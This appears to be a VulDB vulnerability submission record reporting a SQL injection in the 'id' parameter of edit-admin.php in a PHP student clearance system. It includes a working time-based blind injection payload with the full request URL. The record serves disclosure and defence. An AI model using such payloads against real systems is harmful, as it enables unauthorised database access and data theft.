| 标题 | Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php) |
|---|
| 描述 | Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)
url:/Admin/edit-admin.php
URI parameter 'id' is vulnerable
Line 32 of edit-admin.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.
payload:
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1:80/student_clearance_system_Aurthur_Javis/admin/edit-admin.php?id=5' AND (SELECT 2846 FROM (SELECT(SLEEP(5)))sOPo) AND 'uvpP'='uvpP
Download Code: https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html |
|---|
| 来源 | ⚠️ https://blog.csdn.net/qq_41988749/article/details/127552717?spm=1001.2014.3001.5502 |
|---|
| 用户 | jinyadong (UID 34634) |
|---|
| 提交 | 2022-10-27 09時17分 (4 年前) |
|---|
| 管理 | 2022-10-28 07時32分 (22 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 212415 [SourceCodester Web-Based Student Clearance System Admin/edit-admin.php 标识符 SQL注入] |
|---|
| 积分 | 20 |
|---|